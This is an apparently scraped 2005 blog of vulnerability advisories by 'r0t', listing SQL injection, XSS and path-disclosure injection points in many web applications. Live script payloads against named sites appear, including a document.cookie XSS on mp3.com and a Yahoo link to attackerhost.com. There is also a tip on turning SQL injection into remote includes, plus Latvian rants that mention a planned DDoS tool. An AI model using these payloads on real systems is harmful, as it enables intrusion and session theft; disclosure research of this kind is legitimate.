BugPort Multiple vuln.

BugPort Multiple vuln.


r0t last vuln. report/advisory in 2005 year!

Vuln. discovered by : r0t
Date: 31 dec. 2005
vendor:www.incogen.com/index.php?type=General¶m=bugport
affected version:v1.147 and prior

Product Description:

The BugPort system is an open-source, freely available, web-based system to manage tasks and defects throughout the software development process. BugPort is written with the PHP language using its object-oriented capabilities and is in use by INCOGEN for internal management of software development and QA.


Vuln. Description:

1.
BugPort contains a flaw that allows a remote sql injection attacks.Input passed to the "orderBy" "where" "devWherePair[1][0]" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


/index.php?view=DevelopmentItemResultsView&devWherePair
%5B0%5D=state_id+%3C+%3F++AND++MATCH+%28report%2Csubjec
t%2Cdevelplan%2Cfixednotes%2Crepsteps%29+AGAINST+%28%3F
++IN+BOOLEAN+MODE%29&devWherePair%5B1%5D%5B0%5D=[SQL]


/index.php?view=DevelopmentItemResultsView&where=project
_id+%3D+%3F&orderBy=[SQL]

/index.php?view=DevelopmentItemResultsView&where=[SQL]




2.
BugPort contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to multiple paremters(see POC below) in "index.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

/index.php?view=AddToFavoriteItemSetView&ids%5B0%5D=[XSS]

/index.php?view=AddRelatedDevelopmentItemFormView&report_id
=9&action=[XSS]

/index.php?view=AddRelatedDevelopmentItemFormView&report_
id=[XSS]

/index.php?view=DevelopmentItemResultsView&devWherePair
%5B0%5D=state_id+%3C+%3F++AND++MATCH+%28report%2Csub
ject%2Cdevelplan%2Cfixednotes%2Crepsteps%29+AGAINST
+%28%3F++IN+BOOLEAN+MODE%29&devWherePair%5B1%5D%5B0%5D
=240&devWherePair%5B1%5D%5B1%5D=[XSS]


/index.php?view=DevelopmentItemResultsView&where=project
_id+%3D+%3F&orderBy=priority_id+DESC&binds%5B0%5D=[XSS]



3.

Input passed to the "action" paramter isn't properly sanitised before being returned to the user. which may expose sensitive information about the system configuration and full instalisations path.


/index.php?view=AddRelatedDevelopmentItemFormView&report_id
=9&action=[CODE]


Solution:
Edit the source code to ensure that input is properly sanitised.

Pridela statistika

Gada pedeja diena ieskatoties skaititajos ieksh counter.hackers.lv , mes redzam ka neapshaubams liideris ne tikai peedjos meneshos ir bijis shis blogs.

Sheit ir peedeja meeneshu statistika:




Nepiekriteji var teikt ka kaads ir mesls un ka blogs ir suuds, bet paarspej kaut vai tikai apmekletibas zinja daudzus popularus pasakumus, neapshaubmi esot par latvijas apmekleto blogu!

Katra zinja shii bloga apmekletaji liekoties ir droshiibas specialisti arpus latvijas ,katra zinja ja pat blogs riitdien mirs tad veel visu nakamo gadu cilveki runas par to.Tas tik apliecina ka savu esam panaakushi un ka arii shim visam buus turpinajums , dienas paradisies forums varbuut nieciigs saits ...bet pats galvenais ka visa atmosfera kas valdija sheit arii paliks, kaut peedeja laika esat pamanijushi ka parvertas vairak par bugtraqu nevis normalu blogu, bet tas viss piederejas pie lietas, taadu strateegiju ne stillu mees izveljamies, kameer nebuus atapaklaj foruma tikmer es publiceeshu kaut vai vismaz ievainojamibas no dazhadiem pasaakumiem.

r0t ievainojamibas:

Par ievainojamibam , daudzas no manis publiceetam ievainojamibam skara scriptus kuri nekad nebija bijushi bugtraqos vispar un nebuutu vispar bijushi, jo nekadi demo nekadi downloadi parastiem mirstigiem kuri neshkkirsies no sumamm virs 50,000 vai pat 100,000$ nebija iespejami.
Un ja pat man izdevas vinjos tikai atrast kaut kadus elemterus XSS bagus, to nevareja izdariit neviens pirms manis.
Teiksat kas tad tur taads, ok... piesedies pie bankas saita un redzeism cik viegli tev meklesies ievainojamiibas kaut vai XSS.
Te atksaneja no gudriniekiem ka tas ir fufelis, ko es daru, tik nez kapeec 3 no popularakiejiem vuln scanneru developeriem griezas pie manis peec padomiem?
Varesi izdaritt labak par mani nopirkshu saldejumu, nesvaidies ar vardiem ja neko nevari pats!

Pateikshu prieksha saits jaunais un forums buus atrodams zem domena r00t.it!

tapat pateikshu prieksha ka DDOS toolis Alberts iznaks kaut kad janvari, tad kad cembo buus vairak laika un veleshanas!

Veltiits visam piizdam

Shodien atkal pamaniju ka redz kadam kaut kas sheit nepatiik , redz kad agrak blogs bij veel lasams , esmu losis es neko nevaru utt. un lai labak pastastu par kardingu.

Tapec sho postu veltiishu visam latviski runajosham piizdam , kuram niez un uz vietas sava kakta nevar normali noseedeet.
Seezhat sava datuve vai taisat augsha jaunu hackers lv un tupat tur , sheit neviens jums nespiezh neko lasiit un nakt uz shejieni.
Un shini gadijuma konkreti: loh ja tavas zinashanas kaut vai butu videja liimeni tad vispar sheit neliistu un nesmirdeetu, tu vari kaut ko paarmest puisheljiem ar kuriem kopa baksties pa kaktiem .
Vajag tev warezu ej uz hack.nite ruupejies pa droshiibu ej uz netsec , ko tu sheit mekle, halvu ? Da pasuuka sev pimpi buus tev halva.
Ja atnaci te paradit cik esi kruts , tad droshi vari izvelties citu vietu kur smirdet,a ja esi tik speejigs piirags tad njem un izdzes shito blogu... Un es vel tev par to saldejumu uzsaukshu.
Un par kardingu, man nekada sakara ar to nav ... prieksh kardinga ir speciali forumi un tur tev vai jums ari pastastis pa kardingu.
Tapeec kad nakamo reizi ienaks galva ideja paspiidet ar savu gudriibu , no saakuma pasuka sev tad padoma vai tiesham esi tik kruts lai te kaut ko kaadam paarmestu.

PS. jau ieprieksh saku visiem tiem punisheriem kas tagad peekshnji iedomasies ka tadi redz vinji buus un siiko r0t paarmacis par vinja atbildi uz vinju smirdeeshanu, to ka juus visi esat meesli. Un peec respekta no juus pusi netiecos , shis ir manas majas un ja kaads nak un spljaudities sheit tad sanjem to pashu atpakalj.
Un viss kas sheit tiek dariits netiek darits prieksh sevis , bet prieksh cilvekiem kam tas ir vajadziigs un nekas nemainiisies delj paris neatiistitiem idnividiem.
Necienisat mani necienishu juus, splausat sheit spljaushu juma seja...
Seezhat sava lokalaja tiikla un tirinaties talak , jums sheit nav ko dariit shis ir pivat blogs!

+
Gudriniekie , lielie net owneri , da juus kadreiz izsakot savu viedokli sanjematies drosmi , lai nav man vienmer jaruna ar anonimiem mesliem!


ja kadam slikti daleca varu ari atkartoties!

r0t

Kayako SupportSuite multiple vuln.

Kayako SupportSuite multiple vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:http://www.kayako.com/supportsuite.php
affected version: v3.00.26 and prior

Product Description:

Kayako SupportSuite offers true integrated Multi-Channel solution allowing you to manage your emails, online issues, chats, self service and issues received by phone. The entire system has been designed to improve productivity and provide seamless integration between all the available modules. With rich AJAX based interface and unmatched features like IRS, VoIP, ViewShare you can be assured that your client issues are not only handled in a timely but efficient manner.


Vuln. Description:

Kayako SupportSuite contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "nav" paremter in "index.php" and field "Full Name","Email" "Subject" "Registered Email" paramters in "regsiter" "submit" "lostpassword" modules isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


POC:


/index.php?_m=downloads&_a=view&
parentcategoryid=3&pcid=1&nav=[XSS]


FOR POC Manulally enter:
''[XSS]

in

/index.php?_m=core&_a=register

Full Name:
Email:

/index.php?_m=tickets&_a=submit

Full Name:
Email:
Subject:

/index.php?_m=core&_a=lostpassword

Registered Email:


+

Attacker can view full install. path ,this flaw exists cauz input to "_a","newsid","downloaditemid","kbarticleid" parameters isn't properly sanitised before being returned to the user.

/index.php?_m=news&_a=[FULL PATH]

/index.php?_m=news&_a=viewnews&newsid=[FULL PATH]

/index.php?_m=downloads&_a=downloadfile&downloa
ditemid=[FULL PATH]

/index.php?_m=knowledgebase&_a=viewarticle&kbart
icleid=[FULL PATH]

Solution:
Edit the source code to ensure that input is properly sanitised.

22C3: Private Investigations by r0t

Today @ 22C3 private investigations or eu. hackers conference meet some my old friends, "The Cracker" and other "-??-" both i know from crackers scene. -??- was sitting in da one of corner with his box and was showed that he is very busy as always:) The Cracker told that he is out from cracking and try to legalize his life...
Thats the nice stuff...
There was and will be today some good lectures , but...if many of them are unintresant for me like gsm,xbox or terorosim stuff..
About anonymity, there was JAP,etc..
I dont think that in meetings like this one must speak about projects like JAP.
speakers was ok... In da dark room was alltime some overlockers ...i will never understand why shoud give so much time to overlock door key lock or nike key lock...
There was alot of .net junkies... like a paradise for them.. 24 hours at day chillin with they boxes:)
Bonnus stuff , there was stand for someone who offer ssl stuff, they gaved ssl certificates for free..isnt amazing? ... yeah... i dont think that is a some bonnus..
In one area there was some books about liquid life and communism ,nazis,marijuna,lsd and other crazy things...(i suppose to give that area undergound meaning)
Ok. too much critic for organization, but anyway i had my fun there ...learned?
No, just saw some other views and ways to solve problems and to get sucess.
Today is last day and i will not go there but if you are in berlin you can take view.

about my english.. i think you already know.

iPei Guestbook XSS vuln.

iPei Guestbook XSS vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:http://www.epistream.com/ipei/
affected version:v1.7 and prior

Product Description:

iPei is a simple but elegant little guestbook. The interface is OS X gui-ish, and it comes with mundane features like pass word protection, IP view, entry pruning, commenting, Y! smilies, secure posting, and owners may customize some aspects of displays.


Vuln. Description:

iPei Guestbook contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to email field paremters in "/index.php?a=sign" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

OoApp Guestbook XSS vuln.

OoApp Guestbook XSS vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:http://www.ooapp.com/
affected version:2.1 and prior

Product Description:

This is a free php based guestbook for your web site. Easy to setup, no MySQL necessary. Uses a basic flat file. Includes managment area, and general area where users can sign the guestbook. This version corrects a problem that came up when someone did not enter their email address into the guestbook.

Vuln. Description:

OoApp Guestbook contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "page" paremter in "home.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

poc:


/home.php?page=1[XSS]
or
/home.php?do=add_form&page=1[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

AdesGuestbook XSS vuln.

AdesGuestbook XSS vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:www.adesdesign.net/php/products_adesguestbook.php
affected version:v2.0 and prior


Product Description:

This is a Guestbook which works with PHP and MySql. Admin Page is a secure page that can be logged in only by admininstrator and includes functions such as deleting the record and modifying the record. Records can be deleted/modified by ID, Email and Date. It is developed with the customization in mind, so you can easily change the look of the AdesGuestbook according to your website. It uses one single CSS file for the table colors and text format. By changing this CSS file you can apply your choice of colors easily to the whole Guestbook.

Vuln. Description:

AdesGuestbook contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "totalRows_rsRead" paremter in "read.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

poc:


/read.php?pageNum_rsRead=1&totalRows_rsRead=[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

Happy New Year !!!

Me and crew wish a happy new year to everyone!

----------------------------------------------------

last days in 2005 , r0t will be on european hackers conference, so here will be no vuln. or security reports from r0t at last days...So, take a break!:)

Other guys will enjoy they holydays around the globe and with family...

New vuln,advisories,board on 2006 year!


With best wishes r0t,der4444,RaZbh,cembo!!!

Sql Injection, take complete advantage

Security/Hack Tip:
If a script stores path information in a DB and that information is later used in include statements; with an sql injection this can lead to remote includes. Obvious, but could be easily overlooked. I just wanted to add that after watching the last video that was posted here.

Php writers: Dont store paths in a DB.

Hackers: If you find a sql injection, check if the script does this.

Blind MySQL injection database stressing tool

Hi..

Seems someone wins a fight against a blind MySQL injection, with mysql
v3 and magic_quotes enabled.. This is the funny video:
http://www.reversing.org/files/beyond_mysql_injection.avi

ed2k://|file|beyond_mysql_injection.avi|18148274
|CD388D581A720AF5C5887117D9279A1A|h=UZFXHKMLGBOB
P56FAYF2LLFNSQARNKQW|/

There's also another video here:
http://www.unsec.net/download/bsqlbf.avi

The Magic is in the ending part of the video!

The tool ("sqlbftools") is under the "projects" section and a little
article ("Blind MySQL injection and database stressing") is under the
"essays" section in the page: http://www.reversing.org. The msqlbf perl
script is available at http://www.unsec.net/


Ping!


Grettings to Dsr! and 7a69


PD: Dab told me to say nothing about http://unsec.net


--
kanutron (aka Josepmaria Roca)
* mailinglists at kanutron.net
* http://kanutron.net/
---------------------------------------------------------
" las opiniones son como los culos,
todo el mundo tiene el suyo "
- Harry Challahan -

CommonSpot Content Server vuln.

CommonSpot Content Server vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:http://www.paperthin.com/
affected version:4.5 and prior


Product Description:

PaperThin's award-winning technology enables our customers to meet their business objectives. With CommonSpot Content Server, organizations can quickly build and easily maintain dynamic, personalized and sophisticated sites.
CommonSpot scales to meet the Web publishing and content management needs of the most demanding sites, and is used by more than 200 organizations of all sizes worldwide.


Vuln. Description:

CommonSpot Content Server contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "NewWindow" paremter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

poc:

XSS:
/loader.cfm?url=/[DIRPATH]/[DIRPATH]/email
-login-info.cfm&errmsg=No%20user%20account
%20was%20found%20for%20that%20email%20addr
ess.%20%20Please%20try%20again.&bNewWindo
w=[XSS]

full path:
/loader.cfm?url=/[DIRPATH]/[DIRPATH]/email
-login-info.cfm&errmsg=[CODE]


Solution:
Edit the source code to ensure that input is properly sanitised.

Communiqué 4 XSS vuln.

Communiqué 4 XSS vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:www.day.com/site/en/index.html
affected version: 4 and prior

Product Description:

Communiqué 4 is the first native JCR (JSR 170) standard compliant enterprise content management solution available on the market today. Communiqué 4 revolutionizes content management by decoupling the content management application from the underlying repository.
Communiqué 4 offers a comprehensive range of fully integrated content solutions that enables leading companies to address all of their global content challenges with one highly scalable, reliable platform.

Vuln. Description:

Input passed to the "query" parameter when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


Solution:
Edit the source code to ensure that input is properly sanitised.

Fatwire UpdateEngine 6.2 multiple XSS vuln.

Fatwire UpdateEngine 6.2 multiple XSS vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:http://www.fatwire.com/
affected version:6.2 and prior


Product Description:

UpdateEngine6 is a dynamic content management (DCM) solution to address some of the challenges facing enterprise-class e-business initiatives. Storing content at the field level in the database, allowing for the management of that content through an Web interface, exposing that content to innumerable uses, and publishing static Web pages and dynamic content form the basis of the UpdateEngine6 dCM solution. It enables business users to manage content, shortens installation and implementation time, provides a rich set of Web-based tools and wizards, and easily integrates with legacy systems. Since it is 100% Java, it can integrate with all major application servers, including IBM, BEA, Sun, Oracle and HP, and with all databases. Under an agreement made on May 1, 2002, FatWire's UpdateEngine announced that it will licensed Autonomy's advanced technology for its flagship product, UpdateEngine, to deliver a fully integrated categorization and retrieval solution into its content management software.

Vuln. Description:

UpdateEngine contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "FUELAP_TEMPLATENAME" "EMAIL" "COUNTRYNAME" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


poc:

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&PAGE_ID
=FWS%5FPAGE%5F1399202&FUELAP_SITEDBID=SITE%5F%2D
66&ACTIVITY_ID=FWS%5FWHITEPAPERS%5F1404733&COUNT
RY_ID=INTSITE%5F1167494&CAMPAIGN_ID=SFCAMPAIGN%5
F%2D1&COUNTRYNAME=us&SOURCEPAGE_ID=FWS%5FPAGE%5F1
415379&FUELAP_TEMPLATENAME=[XSS]

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_
TEMPLATENAME=fws%5FforgotpasswordForm&SOURCEPAGE_
ID=FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402
412&EMAIL=[XSS]&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COU
NTRY_ID=INTSITE%5F1167494&ERROR=error&ACTIVITY_ID
=FWS%5FWHITEPAPERS%5F1300483&COUNTRYNAME=us&FUELA
P_SITEDBID=SITE%5F%2D66&

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TE
MPLATENAME=fws%5FforgotpasswordForm&SOURCEPAGE_ID=
FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402412&
EMAIL=&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRY_ID=IN
TSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5FWHIT
EPAPERS%5F1300483&COUNTRYNAME=[XSS]

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TE
MPLATENAME=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

eggblog vuln.

eggblog vuln.

Vuln. discovered by : r0t
Date: 22 dec. 2005
vendor:www.epicdesigns.co.uk/projects/eggblog.php
affected version:eggblog v2.0 and prior


Product Description:

eggblog is a small, simple, secure and open source blogging package. Anyone with a php and mysql enabled server can make use of our easy to install package to create their own personal blog.


Vuln. Description:


1.
eggblog contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to parameters in "home/search.php" and when performing a search isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

2.
It is also possible to disclose the full path to "search.php" by accessing it with an invalid "q" parameter.


Solution:
Edit the source code to ensure that input is properly sanitised.

AlstraSoft EPay Enterprise v3.0 XSS vuln.

AlstraSoft EPay Enterprise v3.0 XSS vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:www.alstrasoft.com/epay_enterprise.htm
affected version:v3.0 and prior

Product Description:

EPay Enterprise (formally known as DoPays) has been acquired by AlstraSoft and added into our product line with the growing demand for online payment processing business similar to Paypal and Stormpay.com. The most advance and comprehensive version of our EPay series and in the market at the moment, our Enterprise edition not only allows you to start your own payment processor site EPay operators can also offer escrow services with our built in EZ-Escrow module which is great for auction or freelance websites.
EPay Enterprise is the ideal software solution for those who wish to run their own Paypal, Stormpay, or e-gold type of online business. Epay Enterprise comes with a ready out of the box website with all the features you need to run your own payment gateway system at a low price of only $300.


Vuln. Description:

EPay Enterprise contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to paremters in many fields (see below) isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

/enterprise/members/profile.htm
/enterprise/members/card.htm
/enterprise/members/bank.htm
/enterprise/members/subscriptions.htm
/enterprise/members/send.htm
/enterprise/members/request.htm
/enterprise/members/forgot.htm
/enterprise/members/escrow.htm
/enterprise/members/donations.htm
/enterprise/members/products.htm

Solution:
Edit the source code to ensure that input is properly sanitised.

SECURITY.UZ :)

I always loved those guys who say that they are sec. specialist and here is one simple example, that not everyone who call themselfs "security specialist" are real sec. specilists.
Before to learn others, try to educate yourself more, everyone from us can have mistakes cauz we are humans, but if you call yourself as security specialist then check your own security first.

http://www.security.uz/search/default.asp?q=
%22%3E%3Cscript%3Ealert%28%27r0t%20loves%20sec
urity%20guys%20who%20are%20not%20secure%20by%
20themselfes%27%29%3C%2Fscript%3E&only=bugtraq



PS. your site can have more buqs i checked only simplest.

Yahoo! vuln.

POC:
http://de.mf.news.yahoo.com/mailto?url=
http://attackerhost.com/badscript&title
=[ATTACKER NICE TEXT TO TARGET]

ii

CHECK LIVE EXAMPLE

download.com XSS vuln.

download.com have flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "tg" "path" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

http://www.download.com/3120-20_4-0.html?
tag=srch&qt=r0t&tg=[XSS]

http://music.download.com/1300-1_32-142.
html?tag=mhd_su&path=[XSS]

mp3.com XSS vuln.

in da simplest place:)


mp3.com have flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "query" paremter in "search.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

live POC:
http://www.mp3.com/search.php?action=Search
&stype=artist&query=%3Cscript%3Ealert
(document.cookie)%3C/script%3E&x=31&y=16

WebDB SQL inj vuln.

WebDB SQL inj vuln.

Vuln. discovered by : r0t
Date: 22 dec. 2005
vendor:http://www.loissoftware.com
affected version:1.1 and prior

Product Description:
WebDB is the totally generic, instant online database system - It is possible to create a dynamic web site with no programming knowledge. The software comes with an administration system that allows you to create fields, records, etc. and then decide which fields will appear on the search, results and details pages. You also have total control of the look and feel of the database pages.


Vuln. Description:

WebDB contains a flaw that allows a remote sql injection attacks.Input passed to the search parameter in search module isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

Solution:
Edit the source code to ensure that input is properly sanitised.

WAXTRAPP XSS vuln.

WAXTRAPP XSS vuln.

Vuln. discovered by : r0t
Date: 22 dec. 2005
vendor:http://www.waxtrapp.com
affected version:3.0.x already tested on 3.0.1 and previous versions.

Product Description:

WAXTRAPP is a development platform for fully personalized content distribution, content management, enterprise information portals and online information systems. WAXTRAPP is active since 1997 as a leading innovator in the internet software industry. With customers like TV networks, industry, e-government and healthcare WAXTRAPP has proven to be the most scalable and flexible system around and easily integrates with a wide range of external systems. The number one reason people choose WAXTRAPP is because it brings together inter- intra- extranet functionality with fully personalized portal functionality, where otherwise such projects would require the purchase of many different software products and expensive IT-projects to let them work together. This enables mid-sized companies to implement cost-saving solutions otherwise only affordable for multinationals.

Vuln. Description:

WAXTRAPP contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

WANDSOFT e-SEARCH XSS vuln.

WANDSOFT e-SEARCH XSS vuln.

Vuln. discovered by : r0t
Date: 22 dec. 2005
vendor:http://www.wandsoft.com/products/
affected version:latest and its also used as search module for WANDSOFT e-Suite 4 and prior.

Product Description:

The WANDSOFT e-SEARCH function allows the content of your website, extranet or intranet to be indexed, so users can find a specific word or topic without having to browse the entire site. Any changes to the site content are automatically updated in the site index, so that WANDSOFT e-SEARCH will always include the latest information in the search results.

The WANDSOFT e-SEARCH functionality enables you to provide better customer care and to reduce the possible frustration of your website visitors – even novice users will be able to locate and go directly to the area they seek immediately.

Why Use WANDSOFT e-SEARCH?

As well as the benefits of using any WANDSOFT e-Suite module, the particular benefits of using WANDSOFT e-SEARCH are:

- Your customers will be delighted to quickly locate the information or page they seek
- Website visitors will remember a positive experience, reflecting well on your organisation
- No training is required; once installed, the WANDSOFT e-SEARCH functionality is automatic


Vuln. Description:

The WANDSOFT e-SEARCH contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

Prieciigus ziemassveetkus!

Noveeleshu visiem prieciigus ziemasveetkus ari manu kaujas biedru vaarda!
Piedzeraties kaartiigi izsitiet visus logus kaiminjiem, utt. tada gara...
Bet ja nopietni tad tiesham prieciigus ziemsvvetkus veelu visiem.

ak jaa, dargie datuvieshi "topic" paremetru palabojat, a to mazie juus veel taa kadu dienu nonesiis.

Vsjo, visi tagad atpuusties!!!

Text-e XSS vuln.

Text-e XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.text-e.com/
affected version:1.6.4 and prior

Product Description:

Text-e CMS is a full featured Content management solution which dramatically reduces the cost and the complexity associated with creating content rich such as portals,collaborative applications,CRM and others.

Vuln. Description:

Text-e CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

Tangora™ Portal CMS XSS vuln.

Tangora™ Portal CMS XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.tangora.com/
affected version:4.0 and prior

Product Description:

Tangora™ Portal CMS makes it easy for small and mid-sized companies and organizations to communicate via web.

All in one solution
Tangora Portal CMS is modular standard software that enable you to create and manage a wide range of websites on one platform, using one tool.

Tangora Portal CMS not only gives you the tools to manage practically any number of websites, it is web content management, portal management, application server, integration tools, and usage statistics in one advanced, but easy-to-use, package.




Vuln. Description:

SiteSage contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "action" paremter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:

/page1631.aspx?action=[XSS]
/page496.aspx?action=[XSS]


note:For testing , page number is credited to search function.

Solution:
Edit the source code to ensure that input is properly sanitised.

SyntaxCMS XSS vuln.

SyntaxCMS XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.syntaxcms.org/
affected version:1.2.1 and prior

Product Description:

SyntaxCMS simplifies publishing various types of content to a site, facilitates creating and managing arbitrary relationships among content items, automates and accelerates custom development, and encourages reuse of site components with other SyntaxCMS installations. It is built using PHP and MySQL and is licensed under the Common Public License.


Vuln. Description:

SiteSage contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "search_query" paremter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/search/?search_query=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

SpireMedia CMS SQL inj. vuln.

SpireMedia CMS SQL inj. vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.spiremedia.com/
affected version:mx7


Product Description:

The SpireMedia CMS is an enterprise class Content Management System for managing Websites, Intranets, and Extranets. It runs under the ColdFusion application server and is platform neutral. The system is component-based, allowing objects properties to be extended via custom components and provides support for many applications such as message boards, calendaring, tech tips, user contributed content, etc. The SpireMedia CMS is currently deployed for such companies as Steamboat Ski and Resort, United Agri Products, GE Johnson Contruction, Rocky Mountain Clothing Company, Qwest Incredible Internet, and many others.

Vuln. Description:

SpireMedia CMS contains a flaw that allows a remote sql injection attacks.Input passed to the "cid" parameter in "index.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


Solution:
Edit the source code to ensure that input is properly sanitised.

SPIP XSS vuln.

SPIP XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.spip.net/en
affected version:1.8.2 and prior

Product Description:

SPIP is a publishing system developed by the minirézo to manage the site uZine. We provide it to anyone as a free software under GPL license. Therefore, you can use it freely for your own site, be it personnal, co-operative, institutional or commercial.

Vuln. Description:

SPIP contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to paremters in "spip_login.php3" "spip_pass.php3" fields isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

Speartek XSS vuln.

Speartek XSS vuln.

Vuln. discovered by : r0t
Date: 21 dec. 2005
vendor:http://www.speartek.com
affected version:6.0 and prior


Product Description:

SpearTek's advanced solutions help you optimize the Internet channel to fuel ongoing business success. Our technology enables companies to leverage a single platform to manage content, email marketing and ecommerce applications, easily and cost-effectively. Whether you are a multi-million dollar enterprise or a start-up venture, our solutions advance your business objectives by delivering real return on investment while enhancing the customer experience.


Vuln. Description:

SpearTek contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

SiteSage XSS vuln

SiteSage XSS vuln

Vuln. discovered by : r0t
Date: 21 dec. 2005
vednor:http://www.starphire.com/
affected version:5.0.18 and prior,SiteSage-EE,SiteSage-SE,SiteSage-SB,SiteSage-LE

Product Description:

SiteSage provides a completely non-technical web content management system for the creation and administration of your web site. Features include; built in Templates and Themes, Font Style Editor, WYSIWYG Content Editor, Message Boards, Mailing Lists, Sign up Forms, Banner Ad Manager, Dynamic Content Rotation, and much more. SiteSage is a complete ASP application for installation on your (or your hosting firm's) MS IIS web server. SiteSage is entirely server based permitting updates to a website to be made from work, home, or anywhere. SiteSage can be completely installed to your web server using standard FTP access. The Lite Edition is free for both commercial and non-commercial use.


Vuln. Description:

SiteSage contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "norelay_highlight_words" parameter when performing a search isn't properly sanitised before being returned to the user.
